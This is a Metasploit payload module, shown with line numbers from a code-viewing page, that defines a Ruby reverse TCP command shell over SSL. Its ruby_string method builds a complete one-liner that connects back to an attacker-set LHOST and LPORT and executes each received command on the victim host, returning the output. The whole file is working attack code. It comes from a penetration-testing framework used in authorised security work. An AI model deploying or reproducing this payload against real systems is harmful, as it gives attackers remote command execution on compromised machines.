Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = 444
10

11
  include Msf::Payload::Single
12
  include Msf::Payload::Ruby
13
  include Msf::Sessions::CommandShellOptions
14

15
  def initialize(info = {})
16
    super(merge_info(info,
17
      'Name'        => 'Ruby Command Shell, Reverse TCP SSL',
18
      'Description' => 'Connect back and create a command shell via Ruby, uses SSL',
19
      'Author'      => 'RageLtMan <rageltman[at]sempervictus>',
20
      'License'     => MSF_LICENSE,
21
      'Platform'    => 'ruby',
22
      'Arch'        => ARCH_RUBY,
23
      'Handler'     => Msf::Handler::ReverseTcpSsl,
24
      'Session'     => Msf::Sessions::CommandShell,
25
      'PayloadType' => 'ruby',
26
      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
27
    ))
28
  end
29

30
  def generate(_opts = {})
31
    rbs = prepends(ruby_string)
32
    vprint_good rbs
33
    return rbs
34
  end
35

36
  def ruby_string
37
    lhost = datastore['LHOST']
38
    lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
39
    rbs = "require 'socket';require 'openssl';c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\","
40
    rbs << "\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end"
41
    return rbs
42
  end
43
end
44

45